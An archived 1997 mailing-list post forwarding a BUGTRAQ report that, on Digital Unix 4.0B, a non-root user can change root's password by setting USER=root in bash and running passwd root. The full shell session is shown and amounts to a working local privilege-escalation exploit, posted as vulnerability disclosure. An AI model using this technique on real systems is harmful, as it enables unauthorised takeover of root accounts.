[H-GEN] [mmokrejs at PRFDEC.NATUR.CUNI.CZ: Re: SunOS exploit. & DigitalUnix]
Martin Pool
m.pool at pharos.com.au
Tue May 20 19:06:00 EDT 1997
Doubtless the people here who need to know already do, so this is
presented purely for your entertainment.
------- Start of forwarded message -------
Date: Tue, 20 May 1997 10:17:29 +0200
From: Martin Mokrejs <mmokrejs at PRFDEC.NATUR.CUNI.CZ>
Subject: Re: SunOS exploit. & DigitalUnix
To: BUGTRAQ at NETSPACE.ORG
This also works on Digital Unix 4.0B :-(
login as generic user, than run bash,
bash-2.00$ export USER="root"
bash-2.00$ passwd root
Last successful password change for root: Sun May 4 16:49:07 1997
Last unsuccessful password change for root: NEVER
New password:
Re-enter new password:
bash-2.00$
I succesfully modified root's password :-( Even we have C2 security
installed :-(
I suggest - disable bash !!!
Martin Mokrejs
mmokrejs at natur.cuni.cz
------- End of forwarded message -------
----------------------- HUMBUG General List --------------------------------
echo "unsubscribe general" | mail majordomo at humbug.org.au # To Unsubscribe
More information about the General
mailing list